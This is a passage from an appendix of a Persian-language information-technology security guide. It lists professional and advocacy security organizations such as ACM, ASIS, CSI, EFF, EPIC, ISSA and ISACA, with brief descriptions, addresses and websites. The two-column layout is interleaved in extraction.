‫ﺟﺎﻳﮕﺰﻳﻦ ﻛﻨﻴﺪ‪ ،‬ﺣﺪﺍﻗﻞ ﺑﺎﻳـﺪ ﺍﻳـﻦ ‪ Wizard‬ﺭﺍ ﺑﻜـﺎﺭ ﺑﺮﻳـﺪ ﺗـﺎ‬ ‫ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺑﺎ ﺳﻴﺴﺘﻢ ﻛﺎﺭ ﻣـﻲﻛﻨﻨـﺪ‪ ،‬ﻭ ﻧﻴـﺰ‬
‫ﺍﺟــﺰﺍﻱ ﻏﻴﺮﺿــﺮﻭﺭﻱ ﺁﻧــﺮﺍ ﺍﺯ ﻛــﺎﺭ ﺍﻧﺪﺍﺧﺘــﻪ ﻭ ﺍﻣﻨﻴــﺖ ﻧــﺼﺐ ﻭ‬ ‫ﻗﺎﺑﻠﻴﺖ ﺛﺒﺖ ﻭ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﭘﻴـﺸﺮﻓﺘﻪﺗـﺮ‪ .‬ﺍﻳـﻦ ﻭﻳﮋﮔﻴﻬـﺎﻱ‬

‫‪515 Doug Schales‬‬


‫‪517 Microsoft Baseline Security Analyzer‬‬ ‫‪516 David Curry‬‬
‫‪٤٨٧‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫ﭘﻴﻜﺮ ﺑﻨﺪﻱ ﺁﻥ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﻴﺪ‪ . .‬ﺍﻳﻦ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺍﺯ ﺁﺩﺭﺱ ﺯﻳـﺮ‬


‫ﻗﺎﺑﻞ ﺩﺳﺘﻴﺎﺑﻲ ﺍﺳﺖ‪:‬‬
‫‪http://www.microsoft.com/Downloads/Releas‬‬
‫‪e.asp?ReleaseID=43955‬‬
‫ﺑﺨﺶ ﺷﺸﻢ‬
‫‪٤٨٩‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫‪ ACM‬ﺩﺍﺭﺍﻱ ﻳﻚ ﻛﻤﻴﺘﺔ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻋﻤﻮﻣﻲ ﺑـﺮﺍﻱ ﭘـﺮﺩﺍﺧﺘﻦ‬


‫ﺑــﻪ ﻗــﻮﺍﻧﻴﻦ ﻣﻌﻠــﻖ ﺍﻳــﺎﻻﺕ ﻣﺘﺤــﺪﻩ ﺩﺭ ﺧــﺼﻮﺹ ﺍﻣﻨﻴــﺖ‪،‬‬
‫ﻣﺤﺮﻣﺎﻧﮕﻲ‪ ،‬ﻭ ﻛﺎﺭﺁﻣﺪﻱ ﺍﺳﺖ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺿﻮﻋﺎﺗﻲ ﻛـﻪ ﺁﻧﻬـﺎ‬
‫ﻻ ﺑـﺮﺍﻱ ﻋﻼﻗـﻪﻣﻨـﺪﺍﻥ ﻣـﺴﺎﺋﻞ‬‫ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺟﺬﺍﺏ ﺍﺳﺖ‪.‬‬ ‫ﭘﻴﻮﺳﺖ ‪۴‬‬
‫‪http://www.acm.org/usacm/‬‬
‫ﺳﺎﺯﻣﺎﻥﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫‪ ACM‬ﻣﻨﺎﺑﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﺮﺍﻭﺍﻧﻲ ﺍﺯ ﺟﻤﻠﻪ ﺍﻃﻼﻋﺎﺕ ﻛﻨﻔﺮﺍﻧﺴﻬﺎ‬
‫ﻭ ﮔﺮﻭﻫﻬﺎﻱ ﺗﺨﺼﺼﻲ ﺧﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻃﻼﻋﺎﺗﻲ ﻛـﻪ ﺍﺯ ﻃﺮﻳـﻖ ﻭﺏ‬ ‫ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺧﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﻔﻴﺪ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ‬
‫ﻻ ﺑﺴﻴﺎﺭ ﺟﺎﻣﻊ ﻭ ﺩﺭ ﺳﺎﺧﺘﺎﺭﻱ ﻋﺎﻟﻲ ﻣﻲﺑﺎﺷﺪ‪:‬‬
‫ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ ﻣﻌﻤﻮ ﹰ‬ ‫ﻛﺮﺩﻩﺍﻳﻢ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﻛﻤﻚ ﻭ ﺍﻃﻼﻋـﺎﺕ‬
‫‪٥٢٠‬‬
‫ﺑﻴﺸﺘﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫‪) ASIS‬ﻣﺠﻤﻊ ﺍﻣﻨﻴﺖ ﺻﻨﻌﺘﻲ ﺍﻣﺮﻳﻜﺎ(‬
‫ﺳﺎﺯﻣﺎﻥﻫﺎﻱ ﺣﺮﻓﻪﺍﻱ‬
‫ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺣﺮﻓﻪﺍﻱ ﺑﺮﺍﻱ ﻛﺴﺎﻧﻲ ﻛﻪ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺍﻣﻨﻴـﺖ ﻛـﺎﺭ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺠﻤﻊ ‪ ۴۰‬ﺳﺎﻝ ﺍﺳﺖ ﻛﻪ ﻓﻌﺎﻟﻴـﺖ ﻣـﻲﻛﻨـﺪ ﻭ ﺗـﺎ‬ ‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺯﻳﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﺑـﺴﻴﺎﺭ ﻣﻔﻴـﺪ ﺑﺎﺷـﻨﺪ‪ .‬ﭼﻨـﺪ‬
‫ﺳﺎﻝ ‪ ۲۰۰۲‬ﺩﺍﺭﺍﻱ ‪ ۳۲۰۰۰‬ﻋﻀﻮ ﺍﺯ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑـﻮﺩﻩ ﺍﺳـﺖ‪.‬‬ ‫ﺳﺎﺯﻣﺎﻥ ﺍﻭﻝ ﺧﺒﺮﻧﺎﻣﻪ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻣﺮﺍﻛﺰ ﺁﻣﻮﺯﺷﻲ ﺩﺍﺭﻧـﺪ‪ ،‬ﻭ‬
‫‪ ۲۵‬ﻛﻤﻴﺘﺔ ﺩﺍﺋﻤﻲ ﺁﻥ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ‪ ،‬ﺧﺼﻮﺻﹰﺎ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ‬ ‫ﻛﻨﻔﺮﺍﻧﺲ ﺑﺮﮔﺰﺍﺭ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ‪ FIRST‬ﻧﻴﺰ ﻣﻲ ﺗﻮﺍﻧﻨﺪ‬
‫ﻣﺘﻤﺮﻛﺰﻧﺪ‪ .‬ﺍﻳﻦ ﮔﺮﻭﻩ ﻫﺮ ﻣﺎﻩ ﻣﺠﻠـﻪﺍﻱ ﺩﺭ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ ﺍﻣﻨﻴـﺖ ﻭ‬ ‫ﺩﺭ ﻣﻮﺍﻗﻊ ﺍﺿﻄﺮﺍﺭﻱ ﺑﻪ ﻛﻤﻚ ﺷﻤﺎ ﺑﻴﺎﻳﻨﺪ‪.‬‬
‫ﻓﻘﺪﺍﻥ ﻣﺪﻳﺮﻳﺖ ﺑﻪ ﭼﺎﭖ ﻣﻲﺭﺳﺎﻧﺪ‪ ASIS .‬ﻫﻤﭽﻨﻴﻦ ﺍﺯ ﺟﻠﺴﺎﺕ‬
‫‪٥١٨‬‬
‫ﮔﻔﺘﮕﻮ ﻭ ﺩﻳﮕﺮ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﮔﺮﻭﻫﻲ ﺣﻤﺎﻳـﺖ ﻣـﻲﻛﻨـﺪ ﻭ ﺍﻣﻜـﺎﻥ‬ ‫‪) ACM‬ﻣﺆﺳﺴﻪ ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﺤﺎﺳﺒﺎﺗﻲ(‬
‫ﻋﻀﻮﻳﺖ ﺩﺭ ﺁﻥ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺍﻓـﺮﺍﺩﻱ ﻣﻴـﺴﺮ ﺍﺳـﺖ ﻛـﻪ ﺩﺭ ﻳـﻚ‬
‫ﺳﻄﺢ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺎ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺩﺭﮔﻴﺮ ﻫﺴﺘﻨﺪ‪.‬‬ ‫ﻗﺪﻳﻤﻲﺗﺮﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺣﺮﻓﻪﺍﻱ ﻋﻠﻮﻡ ﺭﺍﻳﺎﻧﻪ ﺍﺳـﺖ ﻛـﻪ ﻣﺠـﻼﺕ‬
‫ﻋﻠﻤﻲ ﺑﺴﻴﺎﺭﻱ ﭼـﺎﭖ ﻣـﻲﻛﻨـﺪ ﻭ ﺳـﺎﻟﻴﺎﻧﻪ ﺩﺭ ﺑﺮﮔـﺰﺍﺭﻱ ﺩﻫﻬـﺎ‬
‫‪American Society for Industrial Security‬‬ ‫ﻛﻨﻔﺮﺍﻧﺲ ﻭ ﻛﺎﺭﮔﺎﻩ ﺗﺤﻘﻴﻘﺎﺗﻲ ﻭ ﺍﺟﺘﻤﺎﻋﻲ ﻣـﺸﺎﺭﻛﺖ ﻣـﻲﻛﻨـﺪ‪.‬‬
‫‪1625 Prince Street‬‬
‫‪Alexandria, Virginia 22314-2818‬‬ ‫‪ ACM‬ﻫﻤﭽﻨﻴﻦ ﺩﺭﮔﻴﺮ ﻣﻮﺿـﻮﻋﺎﺗﻲ ﭼـﻮﻥ ﺁﻣـﻮﺯﺵ‪ ،‬ﭘـﺮﻭﺭﺵ‬
‫‪+1-703-519-6200‬‬ ‫ﻣﺘﺨﺼﺼﻴﻦ‪ ،‬ﻭ ﻧﻴﺰ ﺗﻮﺳﻌﺔ ﻋﻠﻢ ﻭ ﺩﺍﻧﺶ ﺍﺳﺖ ﻭ ﺩﺍﺭﺍﻱ ﺗﻌـﺪﺍﺩﻱ‬
‫‪http://www.asisonline.org‬‬
‫ﮔﺮﻭﻩ ﺗﺨﺼﺼﻲ )‪ ٥١٩(SGI‬ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﻭ ﻛـﺎﺭﺑﺮﺩ‬
‫ﺭﺍﻳﺎﻧﻪ ﻧﻴﺰ ﻓﻌﺎﻝ ﻫﺴﺘﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ ﮔـﺮﻭﻩ‬
‫‪www.cisecurity.org‬‬
‫ﺍﻣﻨﻴﺖ‪ ،‬ﮔﺮﻭﻩ ﻣﻤﻴﺰﻱ ﻭ ﻛﻨﺘﺮﻝ‪ ،‬ﮔﺮﻭﻩ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‪ ،‬ﮔﺮﻭﻩ ﺭﺍﻳﺎﻧﻪ‬
‫ﻳﻚ ﻣﻨﺒﻊ ﺧﻮﺏ ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻭ‬ ‫ﻭ ﺟﺎﻣﻌﻪ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﮔﺮﻭﻩ ﻣﻬﻨﺪﺳﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ‪ .‬ﺑﺮﺍﻱ ﺗﻤـﺎﺱ ﺑـﺎ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ‪ Unix‬ﻭ ‪.Windows‬‬ ‫ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﺁﺩﺭﺱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬

‫‪٥٢١‬‬ ‫‪ACM Headquarters‬‬


‫‪) CSI‬ﻣﺆﺳﺴﻪ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ(‬
‫‪One Astor Plaza‬‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫‪1515 Broadway‬‬
‫ﺍﻳﻦ ﻣﺆﺳﺴﻪ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۷۴‬ﺑﻪ ﻋﻨﻮﺍﻥ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﭼﻨﺪﻣﻨﻈﻮﺭﻩ‬
‫‪17th Floor‬‬
‫ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺍﻋﻀﺎﻱ ﺧـﻮﺩ ﺩﺭ ﺣﻔﺎﻇـﺖ ﺍﺯ ﻣﻨـﺎﺑﻊ ﭘﺮﺩﺍﺯﺷـﻲ‬
‫‪New York, New York 10036-5701‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺄﺳﻴﺲ ﺷﺪ‪ CSI .‬ﺍﺯ ﺑﺮﮔﺰﺍﺭﻱ ﻛﺎﺭﮔﺎﻫﻬﺎ‬ ‫‪+1-212-869-7440‬‬
‫ﻭ ﻛﻨﻔﺮﺍﻧﺴﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺣﻤﺎﻳـﺖ ﻣـﺎﻟﻲ ﻣـﻲﻛﻨـﺪ‪ ،‬ﻳـﻚ ﻣﺠﻠـﺔ‬ ‫‪http://www.acm.org‬‬

‫‪520 American Society for Industrial Security‬‬ ‫‪518 Association for Computing Machinery‬‬
‫‪521 Computer Security Institute‬‬ ‫‪519 Special Interest Groups‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٩٠‬‬

‫‪٥٢٥‬‬
‫‪) HTCIA‬ﺍﻧﺠﻤﻦ ﭘﻴﮕﺮﺩ ﺗﺨﻠﻔﺎﺕ ﻓﻨﺎﻭﺭﻱ ﭘﻴﺸﺮﻓﺘﻪ(‬ ‫ﺗﺤﻘﻴﻘﺎﺗﻲ ﻭ ﻳﻚ ﻧﺸﺮﻳﺔ ﺗﺨﺼﺼﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺑـﻪ‬
‫ﭼﺎﭖ ﻣﻲﺭﺳﺎﻧﺪ‪ ،‬ﻭ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﻨﺒﻊ ﻣﻬﻢ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ‬
‫ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺣﺮﻓﻪﺍﻱ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﻣـﺸﻐﻮﻝ ﺗﺤﻘﻴﻘـﺎﺕ‬ ‫ﺍﻣﻨﻴﺖ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﻣﺆﺳﺴﻪ ﺑﺮ ﺍﺳﺎﺱ ﺳـﻮﺩ ﻣﺘﻘﺎﺑـﻞ‬
‫ﭘﻠﻴﺴﻲ ﻭ ﭘﻴﮕﻴﺮﺩ ﺟﺮﺍﺋﻢ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﭘﻴﺸﺮﻓﺘﻪ ﺍﺯ ﺟﻤﻠـﻪ ﺗﺨﻠﻔـﺎﺕ‬ ‫ﺧﺪﻣﺎﺕ ﺯﻳﺎﺩﻱ ﺭﺍ ﺑﻪ ﺍﻋﻀﺎ ﻭ ﮔﺮﻭﻫﻬﺎﻱ ﺧﻮﺩ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫـﺪ ﻛـﻪ‬
‫ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻣــﻲﺑﺎﺷــﻨﺪ‪ .‬ﺍﻳــﻦ ﺳــﺎﺯﻣﺎﻥ ﺩﺭ ﺁﻣﺮﻳﻜــﺎ ﻭ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ‬ ‫ﻳﻚ ﻧﻤﻮﻧﺔ ﺁﻥ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﺳﺎﻟﻨﺎﻣﻪ ﺭﺍﻫﻨﻤـﺎﻱ ﺍﻣﻨﻴـﺖ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﻳﮕﺮ ﺷﻌﺒﺎﺗﻲ ﺩﺍﺭﺩ ﻭ ﺍﻃﻼﻋﺎﺕ ﺁﻥ ﺍﺯ ﻃﺮﻳﻖ ﭘﺎﻳﮕـﺎﻩ‬ ‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﺮﻳﺪﺍﺭﺍﻥ‪ ٥٢٢‬ﻛﻪ ﻣﻨﺎﺑﻌﻲ ﺑـﺮﺍﻱ ﻧـﺮﻡﺍﻓـﺰﺍﺭ‪ ،‬ﻣﻘـﺎﻻﺕ‪ ،‬ﻭ‬
‫ﻭﺏ‪ ،‬ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻳﺎ ﺗﻠﻔﻦ ﻗﺎﺑﻞ ﺣﺼﻮﻝ ﺍﺳﺖ‪.‬‬ ‫ﺍﺭﺍﺋﻪ ﻣﺸﺎﻭﺭﺓ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭ ﺧﻮﺩ ﻓﻬﺮﺳﺖ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫‪HTCIA, Inc.‬‬ ‫‪Computer Security Institute‬‬
‫‪1474 Freeman Dr.‬‬ ‫‪600 Harrison Street‬‬
‫‪Amisville, VA 20106‬‬
‫‪San Francisco, CA 94107‬‬
‫‪+1-540-937-5019‬‬
‫‪http://htcia.org‬‬ ‫‪+1-415-947-6320‬‬
‫‪http://www.gocsi.com‬‬
‫‪٥٢٦‬‬
‫‪) ISSA‬ﺍﻧﺠﻤﻦ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ(‬ ‫‪٥٢٣‬‬
‫‪) EFF‬ﺑﻨﻴﺎﺩ ﭘﻴﺸﺮﻭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ(‬

‫ﻳــﻚ ﺳــﺎﺯﻣﺎﻥ ﺑــﻴﻦﺍﻟﻤﻠﻠــﻲ ﺍﺯ ﻣﺘﺨﺼــﺼﻴﻦ ﻭ ﻭﻛــﻼﻱ ﺍﻣﻨﻴــﺖ‬ ‫ﺍﺯ ﻣﺴﺎﺋﻞ ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﺯﺍﺩﻳﻬﺎﻱ ﻣﺪﻧﻲ ﻭ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺣﻤﺎﻳﺖ ﻗـﺎﻧﻮﻧﻲ‬
‫ﺍﻃﻼﻋﺎﺕ ﻛﻪ ﺍﺯ ﺟﻠﺴﺎﺕ ﺁﻣﻮﺯﺷﻲ‪ ،‬ﺍﻧﺘﺸﺎﺭ ﻧﺸﺮﻳﺎﺕ ﻭ ﻓﺮﺻـﺘﻬﺎﻱ‬ ‫ﻣﻲﻛﻨﺪ ﻭ ﺍﮔﺮﭼﻪ ﺍﻫﺪﺍﻑ ﺁﻥ ﺑﺴﻴﺎﺭ ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ‪،‬‬
‫ﺗﻌﺎﻣﻞ ﺭﻭ ﺩﺭ ﺭﻭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨـﺪ ﺗـﺎ ﺳـﻄﺢ ﺩﺍﻧـﺶ‪ ،‬ﻣﻬـﺎﺭﺕ ﻭ‬ ‫ﺍﻣﺎ ﺩﺍﺭﺍﻱ ﻳﻚ ﺑﺎﻳﮕﺎﻧﻲ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺍﺯ ﻣﺴﺘﻨﺪﺍﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ‬
‫ﺗﺨﺼﺺ ﺍﻋﻀﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﺪ‪ .‬ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﻋـﻼﻭﻩ ﺑـﺮ‬ ‫ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﺳﺖ‪.‬‬
‫ﺍﻧﺘﺸﺎﺭ ﻧـﺸﺮﻳﻪ‪ ،‬ﺍﺯ ﻛﻨﻔﺮﺍﻧـﺴﻬﺎ ﻭ ﻛﺎﺭﮔﺎﻫﻬـﺎﻱ ﺍﻳـﻦ ﺣﻴﻄـﻪ ﻧﻴـﺰ‬
‫ﺣﻤﺎﻳﺖ ﻣﺎﻟﻲ ﺑﻌﻤﻞ ﻣﻲﺁﻭﺭﺩ؛ ﻭ ﺩﺭ ﺣـﺎﻝ ﺣﺎﺿـﺮ ﺷـﻌﺒﺎﺕ ﺁﻥ ﺩﺭ‬ ‫‪Electronic Frontier Foundation‬‬
‫‪454 Shotwell Street‬‬
‫ﺳﺮﺍﺳﺮ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭ ﺟﻬﺎﻥ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪.‬‬ ‫‪San Francisco, CA 94110-1914‬‬
‫‪+1-415-436-9333‬‬
‫‪ISSA Headquarters‬‬ ‫‪http://www.eff.org/‬‬
‫‪7044 S. 13th Street‬‬
‫‪Oak Creek, WI 53154‬‬
‫‪+1-414-768-8000‬‬ ‫‪٥٢٤‬‬
‫‪+1-800-370-ISSA‬‬ ‫‪) EPIC‬ﻣﺮﻛﺰ ﺍﻃﻼﻋﺎﺕ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ(‬
‫‪http://www.issa.org‬‬
‫ﻳﻚ ﻣﺮﻛﺰ ﺗﺤﻘﻴﻘﺎﺕ ﻋﻤﻮﻣﻲ ﺍﺳﺖ ﻛـﻪ ﻣﻮﺿـﻮﻋﺎﺕ ﻣـﺮﺗﺒﻂ ﺑـﺎ‬
‫‪٥٢٧‬‬
‫‪) ISACA‬ﺍﻧﺠﻤﻦ ﻣﻤﻴﺰﻱ ﻭ ﻛﻨﺘﺮﻝ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ(‬ ‫ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﻃﻼﻋﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺍﻳﻦ ﻣﺮﻛﺰ ﺍﺯ ﻣﺴﺎﺋﻞ ﺣﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻭ ﺁﺯﺍﺩﻱ ﻣـﺪﻧﻲ ﺣﻤﺎﻳـﺖ‬
‫ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ ﺍﺯ ﻣﺘﺨﺼـﺼﻴﻦ ﻭ ﻭﻛـﻼﻱ ﻣـﺸﺎﻭﺭ ﺩﺭ‬
‫ﻗﺎﻧﻮﻧﻲ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺣﻮﺯﺓ ﻣـﺪﻳﺮﻳﺖ ﻭ ﻣﻤﻴـﺰﻱ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ﻛـﻪ ﺍﺯ ﺟﻠـﺴﺎﺕ‬
‫ﺁﻣﻮﺯﺷﻲ‪ ،‬ﺍﻧﺘﺸﺎﺭ ﻧﺸﺮﻳﺎﺕ‪ ،‬ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲﻧﺎﻣﻪﻫﺎﻱ ﺗﺨﺼﺼﻲ ﺑﻪ‬ ‫‪1718 Connecticut Avenue‬‬
‫ﻛﺎﺭﺷﻨﺎﺳــﺎﻥ ﻭ ﻣﺘﺨﺼــﺼﻴﻦ‪ ،‬ﻭ ﻓﺮﺻــﺘﻬﺎﻱ ﺗﻌﺎﻣــﻞ ﺭﻭ ﺩﺭ ﺭﻭ‬ ‫‪NW, Suite 200‬‬
‫‪Washington, DC 20009‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺗﺎ ﺳﻄﺢ ﺩﺍﻧﺶ‪ ،‬ﻣﻬـﺎﺭﺕ ﻭ ﺗﺨـﺼﺺ ﺍﻋـﻀﺎﻱ‬ ‫‪+1-202-483-1140‬‬
‫ﺧﻮﺩ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﺪ‪ .‬ﺍﻳﻦ ﺍﻧﺠﻤﻦ ﻋﻼﻭﻩ ﺑـﺮ ﺍﻧﺘـﺸﺎﺭ ﻧـﺸﺮﻳﻪ‪ ،‬ﺍﺯ‬ ‫‪info@epic.org‬‬
‫ﺗﺤﻘﻴﻘﺎﺕ‪ ،‬ﻛﻨﻔﺮﺍﻧﺴﻬﺎ ﻭ ﻛﺎﺭﮔﺎﻫﻬﺎﻱ ﻣﺮﺗﺒﻂ ﻧﻴـﺰ ﺣﻤﺎﻳـﺖ ﻣـﺎﻟﻲ‬ ‫‪http://www.epic.org‬‬

‫‪525 High Technology Crimes Investigation Association‬‬ ‫‪522 Computer Security Buyer’s Guide‬‬
‫‪526 Information Systems Security Association‬‬ ‫‪523 Electronic Frontier Foundation‬‬
‫‪527 Information Systems Audit and Control Association‬‬ ‫‪524 Electronic Privacy Information Center‬‬
‫‪٤٩١‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫‪Reston, VA 20190-5108‬‬ ‫ﻣﻲﻛﻨﺪ ﻭ ﺷﻌﺒﺎﺕ ﺁﻥ ﺩﺭ ﺳﺮﺍﺳﺮ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭ ﺟﻬـﺎﻥ ﻭﺟـﻮﺩ‬


‫‪+1-703-326-9880‬‬
‫‪http://www.isoc.org‬‬ ‫ﺩﺍﺭﻧﺪ‪.‬‬

‫‪4, rue des Falaises‬‬ ‫‪ISACA Headquarters‬‬


‫‪CH-1205 Geneva‬‬ ‫‪3701 Algolquin Road, Suite 1010‬‬
‫‪Switzerland‬‬ ‫‪Rolling Meadows, Illinois 60008, USA‬‬
‫‪+41-22-807-1444‬‬ ‫‪+1-847-253-1545‬‬
‫‪info@isoc.org‬‬ ‫‪+1-847-253-1443‬‬
‫‪http://www.isaca.org‬‬
‫‪٥٣٢‬‬
‫‪) IEEE-CS‬ﺟﺎﻣﻌﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻬﻨﺪﺳﺎﻥ ﺑﺮﻕ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ(‬
‫‪٥٢٨‬‬
‫‪) ISC2‬ﻛﻨﺴﺮﺳﻴﻮﻡ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﮔﻮﺍﻫﻲ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ(‬
‫ﺑــﺎ ﭼﻴــﺰﻱ ﺣــﺪﻭﺩ ‪ ۱۰۰،۰۰۰‬ﻋــﻀﻮ‪ ،‬ﺑﺰﺭﮔﺘــﺮﻳﻦ ﺯﻳﺮﻣﺠﻤﻮﻋــﺔ‬
